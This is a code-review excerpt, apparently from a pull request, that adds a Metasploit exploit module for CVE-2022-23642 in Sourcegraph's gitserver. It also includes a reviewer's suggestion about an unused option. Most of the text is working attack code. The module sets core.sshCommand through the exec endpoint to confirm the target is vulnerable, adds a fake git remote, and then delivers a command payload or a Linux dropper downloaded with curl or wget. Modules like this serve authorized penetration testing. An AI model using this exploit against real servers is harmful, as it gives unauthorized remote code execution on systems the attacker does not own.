modules/exploits/linux/http/sourcegraph_gitserver_sshcmd.rb

```diff
@@ -0,0 +1,163 @@
+          ['URL', 'https://github.com/sourcegraph/sourcegraph/security/advisories/GHSA-qcmp-fx72-q8q9'],
+          ['URL', 'https://github.com/Altelus1/CVE-2022-23642'],
+        ],
+        'DisclosureDate' => '2022-02-18', # Public disclosure
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_memory
+            },
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              # when the OS command is executed, it's executed twice which will cause some of the command stagers to
+              # be corrupt, these two work even for larger payloads because they're downloaded in a single command
+              'CmdStagerFlavor' => %w[curl wget],
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper
+            },
+          ]
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 3178
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('EXISTING_REPO', [false, 'An existing, cloned repository'])
+    ])
+  end
+
+  def check
+    begin
+      cloned_repos = send_request_list
+    rescue RuntimeError => e
+      return CheckCode::Unknown(e.message)
+    end
+
+    if cloned_repos.empty?
+      vprint_warning('There must be at least 1 cloned git repo to be exploitable.')
+      return CheckCode::Detected
+    end
+
+    res = send_request_exec(cloned_repos.sample, ['config', '--default', '', 'core.sshCommand'])
+    if res && res.code == 200 && res.body =~ /^X-Exec-Exit-Status: 0/
+      return CheckCode::Vulnerable('Successfully set core.sshCommand.')
+    end
+
+    CheckCode::Safe('Failed to set core.sshCommand.')
+  end
+
+  def exploit
+    if datastore['EXISTING_REPO'].blank?
+      @git_repo = send_request_list.sample
+      print_status("Using automatically identified repository: #{@git_repo}")
+    else
+      @git_repo = datastore['EXISTING_REPO']
+    end
+
+    print_status("Executing #{target.name} target")
+
+    @git_origin = Rex::Text.rand_text_alphanumeric(rand(4..11))
+    vprint_status("Using #{@git_origin} as a fake git origin")
+    send_request_exec(@git_repo, ['remote', 'add', @git_origin, "git@#{Rex::Text.rand_text_alphanumeric(rand(4..11))}:#{Rex::Text.rand_text_alphanumeric(rand(4..11))}.git"])
+
+    case target['Type']
+    when :unix_memory
+      execute_command(payload.encoded, 'git_origin' => @git_origin)
+    when :linux_dropper
+      execute_cmdstager('git_origin' => @git_origin)
+    end
```

Comment:
`git_origin` option is not used.

```suggestion
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
```